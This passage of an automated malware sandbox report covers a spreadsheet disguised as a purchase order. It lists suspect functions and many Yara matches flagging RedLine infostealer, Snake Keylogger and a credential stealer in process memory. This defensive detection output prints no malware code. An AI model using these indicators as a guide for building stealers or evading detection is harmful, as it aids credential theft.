Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01351F32	11_2_01351F32
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_013BBE44	11_2_013BBE44
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_01369EEE	11_2_01369EEE
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: 11_2_005536F0	11_2_005536F0

Document misses a certain OLE stream usually present in this Microsoft Office document type

Source: Orden de compra 0001-00255454.xlam.xlsx

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Found potential string decryption / allocating functions

Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01010A30 appears 46 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01339CB3 appears 31 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 0100F9F2 appears 40 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 01350A30 appears 46 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 00FF9CB3 appears 31 times
Source: C:\Users\user\AppData\Local\directory\name.exe	Code function: String function: 0134F9F2 appears 40 times
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: String function: 0040E1D8 appears 44 times
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: String function: 029DC3A0 appears 34 times
Source: C:\Users\user\AppData\Roaming\negrett.exe	Code function: String function: 029EFE30 appears 46 times

Yara signature match

Source: sheet1.xml, type: SAMPLE	Matched rule: INDICATOR_XML_LegacyDrawing_AutoLoad_Document author = ditekSHen, description = detects AutoLoad documents using LegacyDrawing
Source: 11.2.name.exe.560000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820ee8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a5f26.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3416458.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.c30000.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.344d370.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a503e.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3416458.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.c30000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a503e.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3415570.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820000.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.344d370.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.6a5f26.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 8.2.name.exe.7d0000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 9.2.RegSvcs.exe.820ee8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 12.2.RegSvcs.exe.3415570.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 00000008.00000002.779270718.00000000007D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.887588429.0000000000665000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
Source: 0000000C.00000002.887663991.0000000000C30000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
Source: 0000000C.00000002.888025081.0000000003411000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_SnakeKeylogger author = ditekSHen, description = Detects Snake Keylogger, clamav_sig = MALWARE.Win.Trojan.SnakeKeylogger
Source: 0000000B.00000002.817043732.0000000000560000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000009.00000002.887535540.0000000000820000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
